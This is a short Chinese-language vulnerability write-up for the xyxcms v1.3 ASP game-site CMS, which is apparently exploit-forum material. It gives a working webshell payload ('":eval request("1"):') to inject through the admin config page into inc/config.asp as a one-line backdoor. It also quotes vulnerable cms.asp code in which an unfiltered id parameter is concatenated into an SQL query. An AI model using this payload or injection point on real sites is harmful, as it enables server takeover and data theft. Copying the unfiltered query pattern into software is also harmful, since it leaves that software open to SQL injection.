xyxcms v1.3 小游戏CMS 漏洞说明

国内最专业的ASP网站内容管理系统-小游戏管理系统，他将是您轻松建站的首选利器。小游戏CMS系统对站点管理和创造编辑都有好处，无论是CMS系统的易用性和功能的完善性，都处于领先优势！网站的编辑、发布、管理人员可轻松便捷的通过小游戏CMS系统来提交修改、审批、发布内容。　　[xyxcms] 　　版本信息：V1.3 正式版 　　软件大小：1.66M 　　更新时间：2010年8月6日 　　官方：http://www.xyxcms.com/ 　　漏洞文件: cms.asp 　　程序虽小。 总会遇到! 　　鄙视挂马者。! 　　学习之用。 后果自负。 　　后台拿webshell: 　　admin/admin_config.asp 　　网站地址： 插入 ":eval request("1"):\’ 复制代码代码如下: 　　inc/config.asp 一句话后门 　　act=request(\”action\”) 　　id=trim(request(\”id\”)) 　　…………….\’省略 　　if act=\”getding\” then call getding 　　………………..\’省略 　　sub getding 　　id=request(\”id\”) \’没过滤 　　set rs=server.createobject(\”adodb.recordset\”) 　　sql=\”select ding from flash where id=\”&id 　　rs.open sql,conn,1,1 　　if not rs.eof then 　　if isnull(rs(0)) then 　　response.Write(0) 　　else 　　response.Write(rs(0)) 　　end if 　　else 　　response.Write(0) 　　end if 　　rs.close 　　set rs=nothing 　　end sub